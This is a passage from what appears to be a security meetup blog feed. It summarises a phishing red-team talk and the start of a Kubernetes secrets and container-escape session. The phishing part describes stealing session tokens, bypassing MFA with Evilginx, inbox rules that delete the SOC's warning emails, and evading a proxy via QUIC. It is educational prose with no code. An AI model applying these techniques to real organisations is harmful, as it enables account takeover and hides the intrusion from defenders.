Amazon Voucher / Certification Discount\" translate=\"no\">​</a></h4>\n<p>The second template was an <strong>Amazon voucher email</strong>. We've all seen these - sometimes we get mails about certification discounts, reimbursements, gift cards, or \"You've won a voucher!\" type deals. These are extremely effective in corporate environments because employees are used to receiving benefits, training reimbursements, and discount codes from HR or their organization's learning platforms. You see a <code>₹5000 Amazon Gift Card</code> in your inbox, and your brain goes \"nice!\" before it goes \"wait, is this legit?\"</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"email-authentication-records-spf-dkim-dmarc-and-how-attackers-exploit-them\">Email Authentication Records: SPF, DKIM, DMARC (and How Attackers Exploit Them)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#email-authentication-records-spf-dkim-dmarc-and-how-attackers-exploit-them\" class=\"hash-link\" aria-label=\"Direct link to Email Authentication Records: SPF, DKIM, DMARC (and How Attackers Exploit Them)\" title=\"Direct link to Email Authentication Records: SPF, DKIM, DMARC (and How Attackers Exploit Them)\" translate=\"no\">​</a></h3>\n<p>Before we get into the tooling and the war story, let's quickly cover the email authentication mechanisms that defenders rely on and attackers need to understand (or abuse).</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"spf-sender-policy-framework\">SPF (Sender Policy Framework)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#spf-sender-policy-framework\" class=\"hash-link\" aria-label=\"Direct link to SPF (Sender Policy Framework)\" title=\"Direct link to SPF (Sender Policy Framework)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>SPF is a DNS TXT record that specifies which mail servers (IP addresses) are authorized to send emails on behalf of a domain.</mark> When an email arrives, the receiving server checks if the sender's IP is listed in the domain's SPF record. If not, the email fails SPF validation.</li>\n<li class=\"\"><strong>How attackers exploit it:</strong> If SPF is not configured or is set to a soft-fail (<code>~all</code>) instead of a hard-fail (<code>-all</code>), the receiving server may still accept the email - just mark it as suspicious. Attackers also exploit SPF by sending emails from compromised servers that <em>are</em> in the SPF record, or by using domains that have overly permissive SPF records (e.g., <code>include:_spf.google.com</code> which covers all of Google's infrastructure).</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"dkim-domainkeys-identified-mail\">DKIM (DomainKeys Identified Mail)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#dkim-domainkeys-identified-mail\" class=\"hash-link\" aria-label=\"Direct link to DKIM (DomainKeys Identified Mail)\" title=\"Direct link to DKIM (DomainKeys Identified Mail)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>DKIM adds a cryptographic signature to outgoing emails. The sending server signs the email with a private key, and the receiving server verifies the signature using the public key published in the sender's DNS records.</mark> This ensures the email hasn't been tampered with in transit.</li>\n<li class=\"\"><strong>How attackers exploit it:</strong> If DKIM is not configured, there's no signature to verify - so spoofed emails pass through unchecked. Attackers setting up their own phishing infrastructure will configure DKIM properly on <em>their</em> domain so their phishing emails pass DKIM validation (because DKIM validates that the email came from the domain it claims - and the attacker <em>does</em> own the phishing domain).</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"dmarc-domain-based-message-authentication-reporting--conformance\">DMARC (Domain-based Message Authentication, Reporting &amp; Conformance)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#dmarc-domain-based-message-authentication-reporting--conformance\" class=\"hash-link\" aria-label=\"Direct link to DMARC (Domain-based Message Authentication, Reporting &amp; Conformance)\" title=\"Direct link to DMARC (Domain-based Message Authentication, Reporting &amp; Conformance)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>DMARC ties SPF and DKIM together and tells receiving servers what to do when an email fails authentication - <code>none</code> (do nothing, just report), <code>quarantine</code> (send to spam), or <code>reject</code> (drop the email entirely).</mark> It also provides a reporting mechanism so domain owners can see who is sending emails on behalf of their domain.</li>\n<li class=\"\"><strong>How attackers exploit it:</strong> Many organizations set their DMARC policy to <code>p=none</code> (monitoring mode) and never move to <code>quarantine</code> or <code>reject</code>. This means even if SPF and DKIM fail, the email still gets delivered. Attackers love this.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"hard-bounce-vs-soft-bounce\">Hard Bounce vs Soft Bounce<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#hard-bounce-vs-soft-bounce\" class=\"hash-link\" aria-label=\"Direct link to Hard Bounce vs Soft Bounce\" title=\"Direct link to Hard Bounce vs Soft Bounce\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Hard Bounce:</strong> <mark>The email is permanently rejected - the recipient address doesn't exist, the domain is invalid, or the server flat-out refuses the message.</mark> Hard bounces are bad for sender reputation; too many and your sending IP/domain gets blocklisted.</li>\n<li class=\"\"><strong>Soft Bounce:</strong> <mark>The email is temporarily rejected - the recipient's mailbox is full, the server is temporarily unavailable, or the message is too large.</mark> The sending server will typically retry delivery.</li>\n<li class=\"\"><strong>Why this matters for attackers:</strong> When sending phishing campaigns at scale, attackers monitor bounce rates. Too many hard bounces means their sending infrastructure gets flagged and blacklisted quickly. So they validate email addresses beforehand (using tools like email verification APIs) to minimize bounces and maintain sender reputation for as long as possible.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"real-world-phishing-engagement-a-war-story-from-mahadev\">Real-World Phishing Engagement: A War Story from Mahadev<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#real-world-phishing-engagement-a-war-story-from-mahadev\" class=\"hash-link\" aria-label=\"Direct link to Real-World Phishing Engagement: A War Story from Mahadev\" title=\"Direct link to Real-World Phishing Engagement: A War Story from Mahadev\" translate=\"no\">​</a></h3>\n<p>Now this was the absolute highlight of the session. Mahadev walked us through an actual red team phishing engagement he performed on an organization. This wasn't a hypothetical - this was a real operation, and the way it played out was wild.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-1-initial-credential-harvest\">Step 1: Initial Credential Harvest<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-1-initial-credential-harvest\" class=\"hash-link\" aria-label=\"Direct link to Step 1: Initial Credential Harvest\" title=\"Direct link to Step 1: Initial Credential Harvest\" translate=\"no\">​</a></h4>\n<p>They did the usual - set up phishing infrastructure, sent convincing emails, and harvested user credentials. Standard stuff so far. Multiple employees fell for the phish and their credentials were captured.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-2-the-soc-responds\">Step 2: The SOC Responds<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-2-the-soc-responds\" class=\"hash-link\" aria-label=\"Direct link to Step 2: The SOC Responds\" title=\"Direct link to Step 2: The SOC Responds\" translate=\"no\">​</a></h4>\n<p>Now here's where it gets interesting. The organization had an active SOC team, and the SOC detected that something was off. <mark>The SOC team sent out a legitimate email to the affected employees saying something like - <em>\"You have clicked on a phishing link. Please click here to reset your password immediately.\"</em></mark></p>\n<p>Note - this was a <strong>real email from the actual SOC team</strong>, not an impersonation. The SOC was doing their job. But Mahadev and his team were watching everything unfold in real-time from the compromised accounts, and they had to act fast.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-3-session-hijacking-why-password-resets-dont-always-work\">Step 3: Session Hijacking (Why Password Resets Don't Always Work)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-3-session-hijacking-why-password-resets-dont-always-work\" class=\"hash-link\" aria-label=\"Direct link to Step 3: Session Hijacking (Why Password Resets Don't Always Work)\" title=\"Direct link to Step 3: Session Hijacking (Why Password Resets Don't Always Work)\" translate=\"no\">​</a></h4>\n<p>Here's the thing - <mark>Mahadev's team had already hijacked the user sessions by stealing cookies and tokens. So even if the user resets their password, <strong>the already-active session remains valid.</strong></mark> Logging in and having an active session are two different things. A password reset changes the <em>authentication credential</em>, but it doesn't necessarily invalidate <em>existing sessions</em> that were already authenticated.</p>\n<p>Making it worse, this organization was using <strong>old Office 365</strong> - and in older O365 implementations, <mark>resetting the password does <strong>not</strong> automatically log out already signed-in devices.</mark> So Mahadev's team was sitting pretty with full access even after password resets.</p>\n<p>On top of that, as soon as they saw the SOC email come in, they quickly <strong>added their device as a trusted device</strong> on the compromised accounts. This meant that even if the user went through a full password reset flow, the attacker's device would remain authorized because it's now \"trusted.\"</p>\n<blockquote>\n<p>Someone from the audience asked - \"If we are hijacking sessions, doesn't the session eventually expire?\"</p>\n<p>Great question. Mahadev explained the concept of <strong>refresh tokens</strong>. <mark>Most modern authentication systems use short-lived access tokens paired with longer-lived refresh tokens. When the access token expires, the refresh token is used to silently obtain a new one without re-authentication.</mark> If the attacker continuously uses the refresh token before it expires, they can maintain access indefinitely - the session essentially never dies.</p>\n<p>However, there are limits. <mark>If the organization is using server-side session management (like PHP or other server-side scripts), the server can enforce absolute session timeouts</mark> - meaning the session will be terminated after a fixed duration regardless of activity. Some systems also terminate sessions based on inactivity or anomalous behavior patterns. But many cloud services like O365 rely heavily on the refresh token model, and if the organization hasn't configured strict token lifetime policies, the attacker stays in.</p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-4-scaling-up---targeting-multiple-users\">Step 4: Scaling Up - Targeting Multiple Users<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-4-scaling-up---targeting-multiple-users\" class=\"hash-link\" aria-label=\"Direct link to Step 4: Scaling Up - Targeting Multiple Users\" title=\"Direct link to Step 4: Scaling Up - Targeting Multiple Users\" translate=\"no\">​</a></h4>\n<p>Mahadev mentioned that <mark>they don't compromise just one user at a time - they typically target 15-20 users from the organization simultaneously.</mark> Why? Because it helps them:</p>\n<ul>\n<li class=\"\"><strong>Identify defensive patterns</strong> - how does the SOC respond? How fast do they detect? Do they email users? Do they force logouts? Do they block at the proxy level?</li>\n<li class=\"\"><strong>Exploit user behavior</strong> - some users assume it's just a SOC drill or a phishing awareness exercise, so they don't bother resetting their passwords or even reading the SOC's warning email.</li>\n</ul>\n<p>This multi-user approach gives the red team a much clearer picture of the organization's actual security posture.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-5-deleting-the-socs-warning-emails\">Step 5: Deleting the SOC's Warning Emails<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-5-deleting-the-socs-warning-emails\" class=\"hash-link\" aria-label=\"Direct link to Step 5: Deleting the SOC's Warning Emails\" title=\"Direct link to Step 5: Deleting the SOC's Warning Emails\" translate=\"no\">​</a></h4>\n<p>Now this was the really sneaky part. To prevent users from seeing the SOC's password reset emails and actually resetting their passwords, Mahadev's team <mark>created an <strong>inbox rule</strong> in the compromised email accounts.</mark></p>\n<p>The rule was simple - if the incoming message contains specific keywords like <code>\"RE: Password Reset Request\"</code> or <code>\"Password Reset Request\"</code>, <strong>automatically delete the message.</strong> This way, the SOC keeps sending warnings, but the user never sees them in their inbox.</p>\n<p>But wait - the deleted messages were going to the <strong>Trash folder</strong>. A curious user might open their trash and find them. So how did they handle that?</p>\n<p>Luckily, the organization was using a <strong>third-party email provider</strong> that had an option to configure auto-deletion timers for trash items. <mark>Mahadev's team turned on <strong>developer mode</strong> in the email settings and reduced the trash auto-delete timer to <strong>1 hour.</strong></mark> So even if a deleted SOC email landed in trash, it would be permanently purged within an hour - long before most users would think to check.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-6-pwaova-file-abuse-for-url-delivery\">Step 6: PWA/OVA File Abuse for URL Delivery<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-6-pwaova-file-abuse-for-url-delivery\" class=\"hash-link\" aria-label=\"Direct link to Step 6: PWA/OVA File Abuse for URL Delivery\" title=\"Direct link to Step 6: PWA/OVA File Abuse for URL Delivery\" translate=\"no\">​</a></h4>\n<p>For delivering phishing URLs, they used <strong>PWA (Progressive Web App) / OVA file</strong> techniques.</p>\n<blockquote>\n<p><mark><strong>What is this?</strong> A PWA (Progressive Web App) is essentially a web application that can be installed on a user's device and behaves like a native app. Attackers can abuse PWAs by creating a malicious PWA that, when installed, opens a phishing page in what looks like a standalone application window - no browser URL bar visible, no obvious signs that you're on a fake site.</mark> The <code>.ova</code> (Open Virtual Appliance) format can be similarly abused to package malicious environments. In this case, Mahadev's team leveraged developer mode to push URLs through PWA functionality, making the phishing delivery mechanism harder to detect by traditional email-based controls since the URL isn't sitting directly in the email body in a conventional way.</p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-7-blocked-by-proxy-autoconfig-pac---but-not-everyone\">Step 7: Blocked by Proxy AutoConfig (PAC) - But Not Everyone<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#step-7-blocked-by-proxy-autoconfig-pac---but-not-everyone\" class=\"hash-link\" aria-label=\"Direct link to Step 7: Blocked by Proxy AutoConfig (PAC) - But Not Everyone\" title=\"Direct link to Step 7: Blocked by Proxy AutoConfig (PAC) - But Not Everyone\" translate=\"no\">​</a></h4>\n<p>Eventually, the SOC caught on and <mark>blocked the attacker's infrastructure at the <strong>Proxy AutoConfig (PAC)</strong> level.</mark></p>\n<blockquote>\n<p><strong>What is Proxy AutoConfig (PAC)?</strong> <mark>A PAC file is a JavaScript file that tells a web browser which proxy server to use for a given URL. Organizations deploy PAC files to route employee web traffic through their security proxies, where traffic is inspected, filtered, and logged.</mark> By adding the attacker's domains/IPs to the PAC file's blocklist, the SOC effectively cut off access for any employee whose browser was configured to use the corporate proxy.</p>\n</blockquote>\n<p>But here's the catch - <mark>some employees were connected via <strong>VPN</strong>, and the VPN implementation was not properly configured.</mark> These VPN-connected users were either not routing all traffic through the corporate proxy, or their VPN split-tunneling configuration allowed direct internet access bypassing the proxy. So even though the PAC file was updated to block the phishing infrastructure, the VPN-connected employees were still reachable and exploitable.</p>\n<blockquote>\n<p>This is a classic example of why defense-in-depth matters. A single control (PAC/proxy blocking) failed because of a gap in another control (VPN configuration). Security is only as strong as its weakest link.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"tooling-gophish--evilginx\">Tooling: GoPhish &amp; Evilginx<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#tooling-gophish--evilginx\" class=\"hash-link\" aria-label=\"Direct link to Tooling: GoPhish &amp; Evilginx\" title=\"Direct link to Tooling: GoPhish &amp; Evilginx\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"gophish-framework\">GoPhish Framework<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#gophish-framework\" class=\"hash-link\" aria-label=\"Direct link to GoPhish Framework\" title=\"Direct link to GoPhish Framework\" translate=\"no\">​</a></h4>\n<p>Mahadev then gave an overview of <strong>GoPhish</strong>, one of the most widely used open-source phishing frameworks for security assessments.</p>\n<ul>\n<li class=\"\"><mark><strong>GoPhish</strong> is an open-source phishing toolkit designed for businesses and penetration testers to conduct phishing simulations.</mark> It provides a clean web UI to manage campaigns, track results, and measure employee awareness.</li>\n<li class=\"\">The core workflow in GoPhish is:\n<ol>\n<li class=\"\"><strong>SMTP Configuration</strong> - Set up your sending mail server (with proper SPF, DKIM, DMARC as we discussed earlier).</li>\n<li class=\"\"><strong>Email Templates</strong> - Create or import the phishing email. GoPhish supports template variables like <code>{{.FirstName}}</code>, <code>{{.LastName}}</code>, <code>{{.Email}}</code>, <code>{{.Position}}</code> to personalize each email.</li>\n<li class=\"\"><strong>Tracking</strong> - GoPhish uses a <code>.Tracker</code> variable that embeds a unique tracking pixel in each email. <mark>Each recipient gets a unique <code>rid</code> (recipient ID) parameter appended to URLs and tracking pixels.</mark> This allows the framework to track who opened the email, who clicked the link, and who submitted credentials - all tied back to individual users.</li>\n<li class=\"\"><strong>Landing Page</strong> - This is one of the most important parts. The landing page is what the user sees after clicking the link. GoPhish can clone existing login pages or host custom-built ones. Credentials submitted on the landing page are captured and logged.</li>\n</ol>\n</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"evilginx\">Evilginx<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#evilginx\" class=\"hash-link\" aria-label=\"Direct link to Evilginx\" title=\"Direct link to Evilginx\" translate=\"no\">​</a></h4>\n<p>Mahadev also mentioned <strong>Evilginx</strong>, which takes phishing to a completely different level.</p>\n<ul>\n<li class=\"\"><mark><strong>Evilginx</strong> is a man-in-the-middle (MiTM) attack framework used for phishing login credentials along with session cookies/tokens.</mark> Unlike traditional phishing that just captures a username and password, Evilginx acts as a <strong>reverse proxy</strong> sitting between the victim and the real login page.</li>\n<li class=\"\">When the victim enters their credentials on the Evilginx-proxied page, the credentials are forwarded to the real server, the real server authenticates the user and returns session tokens/cookies, and <mark>Evilginx captures both the credentials <strong>and</strong> the session tokens in real-time.</mark></li>\n<li class=\"\">This means the attacker can bypass <strong>MFA (Multi-Factor Authentication)</strong> - because the victim completes the full MFA flow on the real server, and Evilginx captures the authenticated session token that comes after MFA validation. The attacker then imports this token into their own browser and has a fully authenticated session - no password or MFA needed from their side.</li>\n</ul>\n<blockquote>\n<p>This is exactly what Mahadev was doing in the real-world engagement story above - Evilginx-style session token capture is how they were able to maintain access even after password resets.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"qa-highlights\">Q&amp;A Highlights<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#qa-highlights\" class=\"hash-link\" aria-label=\"Direct link to Q&amp;A Highlights\" title=\"Direct link to Q&amp;A Highlights\" translate=\"no\">​</a></h3>\n<p>The audience had some great questions, and a few stood out:</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"if-were-logging-in-from-a-different-device-wouldnt-the-soc-get-alerted\">\"If we're logging in from a different device, wouldn't the SOC get alerted?\"<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#if-were-logging-in-from-a-different-device-wouldnt-the-soc-get-alerted\" class=\"hash-link\" aria-label=\"Direct link to &quot;If we're logging in from a different device, wouldn't the SOC get alerted?&quot;\" title=\"Direct link to &quot;If we're logging in from a different device, wouldn't the SOC get alerted?&quot;\" translate=\"no\">​</a></h4>\n<p>Mahadev clarified - <strong>logging in and stealing a session are two different things.</strong> A new login from an unfamiliar device/location <em>would</em> trigger alerts in most SIEM/security tools. But <mark>importing a stolen session token doesn't generate a \"new login\" event - it looks like a continuation of the victim's existing session.</mark> To the SOC, it appears as if the legitimate user is still using their account normally.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-cant-next-gen-firewalls-detect-this-they-maintain-session-info\">\"Why can't next-gen firewalls detect this? They maintain session info.\"<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#why-cant-next-gen-firewalls-detect-this-they-maintain-session-info\" class=\"hash-link\" aria-label=\"Direct link to &quot;Why can't next-gen firewalls detect this? They maintain session info.&quot;\" title=\"Direct link to &quot;Why can't next-gen firewalls detect this? They maintain session info.&quot;\" translate=\"no\">​</a></h4>\n<p>Mahadev's honest answer was - <mark>in theory, yes, next-gen firewalls and advanced security solutions <em>can</em> detect session anomalies. But in practice, it's extremely costly for businesses to maintain such granular session inspection at scale.</mark> The compute and storage overhead of tracking every session's behavioral fingerprint across thousands of users is significant. So while the technology exists, most organizations don't deploy it at the depth required to catch this kind of attack.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"would-a-proxy-detect-a-phishing-link-when-its-opened\">\"Would a proxy detect a phishing link when it's opened?\"<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#would-a-proxy-detect-a-phishing-link-when-its-opened\" class=\"hash-link\" aria-label=\"Direct link to &quot;Would a proxy detect a phishing link when it's opened?&quot;\" title=\"Direct link to &quot;Would a proxy detect a phishing link when it's opened?&quot;\" translate=\"no\">​</a></h4>\n<p>He said <strong>yes, if properly configured</strong>, the proxy would detect and block it. But here's where it gets interesting - <mark>some proxies like <strong>Zscaler</strong> cannot block the <strong>QUIC protocol</strong>.</mark></p>\n<blockquote>\n<p><strong>What is QUIC?</strong> <mark>QUIC (Quick UDP Internet Connections) is a modern transport layer protocol developed by Google. Unlike traditional HTTPS which runs over TCP, QUIC runs over <strong>UDP</strong> and uses its own encryption (built on TLS 1.3).</mark> Under the hood, it uses UDP and WebSockets, and the flow of QUIC traffic is fundamentally different from standard HTTPS traffic.</p>\n<p>Mahadev explained that they set up a <strong>QUIC server</strong> and rendered an <strong>iframe</strong> on their server to load the target website. Because <mark>Zscaler (and similarly <strong>Netskope</strong>) cannot natively inspect or block QUIC traffic the same way they handle HTTP/HTTPS</mark>, the phishing page loaded through QUIC effectively bypassed the proxy's URL filtering and inspection capabilities. This is a known gap in several popular CASB/SWG (Secure Web Gateway) solutions.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"final-thoughts\">Final Thoughts<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#final-thoughts\" class=\"hash-link\" aria-label=\"Direct link to Final Thoughts\" title=\"Direct link to Final Thoughts\" translate=\"no\">​</a></h3>\n<p>The rest of the session was a live demo - Mahadev walked through setting up campaigns in GoPhish, attaching payloads, configuring email templates, and demonstrating the full attack flow end-to-end.</p>\n<blockquote>\n<p><strong>Bottom Line:</strong> The key takeaway from Mahadev's session was this - phishing is not just about sending a dodgy email. It's an entire operation that requires careful planning of infrastructure, domains, and evasion techniques. And on the flip side, as defenders, understanding this entire chain is what helps us build better detection and response mechanisms. Every detection method has a bypass, every control has a gap - but layering them together and continuously improving is what makes the attacker's job harder.</p>\n</blockquote>",
            "url": "https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary",
            "title": "Summary of Haxnation Mumbai Meetup held on 27th June 2026",
            "summary": "This blog is a summary of what was taught at  Haxnation Meetup Mumbai held on 27th June 2026.\n",
            "date_modified": "2026-08-09T04:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "GRC",
                "AI",
                "Security",
                "Phishing",
                "Social-Engineering",
                "Email-Security",
                "Evilginx",
                "GoPhish",
                "Session-Hijacking",
                "DPDP-Act-2023",
                "ISO-42001",
                "QUIC-Bypass",
                "Haxnation-Meetup-Summary"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary",
            "content_html": "<p>This blog is a summary of what was taught at HTB Meetup Mumbai #18 held on 01st August 2026.</p>\n<p>In my opinion, the sessions were really fun and bite-sized. Let's see what happened....</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-1-kubernetes-misconfigurations-101-from-leaked-secrets-to-host-compromise-by-deepak-yadav\">Session 1: \"Kubernetes Misconfigurations 101: From Leaked Secrets to Host Compromise\" by Deepak Yadav<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#session-1-kubernetes-misconfigurations-101-from-leaked-secrets-to-host-compromise-by-deepak-yadav\" class=\"hash-link\" aria-label=\"Direct link to Session 1: &quot;Kubernetes Misconfigurations 101: From Leaked Secrets to Host Compromise&quot; by Deepak Yadav\" title=\"Direct link to Session 1: &quot;Kubernetes Misconfigurations 101: From Leaked Secrets to Host Compromise&quot; by Deepak Yadav\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction\">Introduction<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#introduction\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>In the earlier days of application hosting, running a service meant renting a physical server, configuring DNS, and making sure the application was reachable from the outside world. The biggest challenge was reproducibility. A web app that worked perfectly on a developer's laptop could still fail on the server due to differences in environment, dependencies, or runtime configuration. This was the classic \"works on my machine\" problem.</p>\n<p>To solve this, cloud providers introduced managed services that made deployment simpler, enabled autoscaling, and allowed traffic to be distributed through load balancers. But that also introduced a new set of concerns, especially around vendor lock-in and portability. Moving an application from one cloud provider to another often meant reworking parts of the infrastructure and configuration.</p>\n<p>This is where containerization changed the game. Containers made applications lightweight, portable, and easier to deploy. But as organizations started running many containers, managing them manually became difficult. That is where Kubernetes entered the picture.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-kubernetes-became-important\">Why Kubernetes became important<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#why-kubernetes-became-important\" class=\"hash-link\" aria-label=\"Direct link to Why Kubernetes became important\" title=\"Direct link to Why Kubernetes became important\" translate=\"no\">​</a></h3>\n<p>Kubernetes, often abbreviated as K8s, became popular because it solved a very practical problem: how do you manage a large number of containers at scale?</p>\n<p>Instead of deploying services manually, Kubernetes lets you define the desired state of your application and then automatically ensures that state is maintained. If a container crashes, Kubernetes can recreate it. If traffic increases, it can scale the number of replicas. If a service becomes unhealthy, it can replace it. This makes applications more resilient and easier to manage.</p>\n<p>The talk also highlighted that Kubernetes is not only about scaling. It is also about portability and flexibility. Unlike some vendor-specific platforms, Kubernetes is cloud-agnostic and can be deployed on-premises, in private data centers, or on public clouds. That makes it a very attractive choice for organizations that do not want to depend too heavily on a single provider.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-rise-of-containers-and-the-need-for-orchestration\">The rise of containers and the need for orchestration<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#the-rise-of-containers-and-the-need-for-orchestration\" class=\"hash-link\" aria-label=\"Direct link to The rise of containers and the need for orchestration\" title=\"Direct link to The rise of containers and the need for orchestration\" translate=\"no\">​</a></h3>\n<p>Before containers, virtualization existed, but it was still heavy. Virtual machines had their own full operating systems and required more resources. Containers were more lightweight because they shared the host operating system kernel while still providing application-level isolation.</p>\n<p>This made containers much easier to package and ship. Images became smaller, deployments became faster, and scaling became more practical. But when dozens or hundreds of containers started running together, orchestration became a necessity. Kubernetes was designed to fill that role.</p>\n<p>The session emphasized that Kubernetes is essentially an orchestration engine for containerized applications. It handles scheduling, networking, storage, service discovery, and self-healing. In short, it helps teams run modern distributed systems in a more structured way.</p>\n<blockquote>\n<p>To know/learn more about the architecture or related stuff, you can check out the <a href=\"https://haxnation.org/blog/breachforce-mumbai-meetup-june26-summary#introduction\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">K8s Concepts that were covered in other meetup</a></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"secret-management-in-kubernetes\">Secret management in Kubernetes<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#secret-management-in-kubernetes\" class=\"hash-link\" aria-label=\"Direct link to Secret management in Kubernetes\" title=\"Direct link to Secret management in Kubernetes\" translate=\"no\">​</a></h3>\n<p>One of the most important security topics in the session was secret management. Secrets are sensitive values such as API keys, access tokens, database passwords, SSH keys, and TLS material. If these are mishandled, they can become the easiest path to compromise.</p>\n<p>The speaker pointed out that Kubernetes secrets are not magically secure just because they are called secrets. By default, Kubernetes stores them as base64-encoded values, which is not the same as encryption. That means a misconfigured cluster can still expose them if access controls are weak. This is why secret management is such a major topic in cloud-native security.</p>\n<p>The talk also connected this to OWASP K03: Secrets Management Failures, which highlights how often organizations fail to securely store, rotate, or restrict access to secrets. Some of the common problems include:</p>\n<ul>\n<li class=\"\">hardcoding credentials into source code or container images</li>\n<li class=\"\">storing sensitive values in environment variables without proper protection</li>\n<li class=\"\">granting overly broad access to service accounts</li>\n<li class=\"\">failing to rotate tokens and keys regularly</li>\n<li class=\"\">relying on weak or inconsistent secret storage practices</li>\n</ul>\n<p>The session also discussed better approaches to secret handling. These include using dedicated secret management systems such as HashiCorp Vault or cloud-native services like AWS Secrets Manager or Azure Key Vault. The speaker emphasized that organizations should not rely on Kubernetes alone for all secret protection. A stronger design usually includes:</p>\n<ul>\n<li class=\"\">encryption at rest</li>\n<li class=\"\">role-based access control (RBAC)</li>\n<li class=\"\">short-lived credentials where possible</li>\n<li class=\"\">workload identity instead of static long-lived secrets</li>\n<li class=\"\">strong auditing and monitoring</li>\n</ul>\n<p>In other words, secrets should be treated as a first-class security concern rather than an afterthought.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"morpheus-helping-us-to-escape-the-small-matrix\">Morpheus helping us to escape the small matrix<a href=\"https://haxnation.github.io/blog/htb-mumbai-meetup-18-summary#morpheus-helping-us-to-escape-the-small-matrix\" class=\"hash-link\" aria-label=\"Direct link to Morpheus helping us to escape the small matrix\" title=\"Direct link to Morpheus helping us to escape the small matrix\" translate=\"no\">​</a></h3>\n<p>The second half of the session focused on container escape. Sorry for my cringy analogy out there, but that is the only thing that came to my mind while writing. The speaker looked like morepheus too, jk :)\nA container escape happens when an attacker moves from a compromised application container to the underlying host or node. Once that happens, the attacker may gain access to other containers, shared volumes, cluster metadata, or even the host operating system itself.</p>\n<p>The talk explained that container escape is a serious risk because it turns an application-level compromise into a platform-level compromise. In a Kubernetes environment, that can quickly lead to lateral movement and cluster takeover.</p>\n<p>Some of the techniques discussed included:</p>\n<ul>\n<li class=\"\">kernel exploits that break the isolation boundary between the container and the host</li>\n<li class=\"\">abuse of privileged containers</li>\n<li class=\"\">abuse of Linux capabilities that grant excessive permissions</li>\n<li 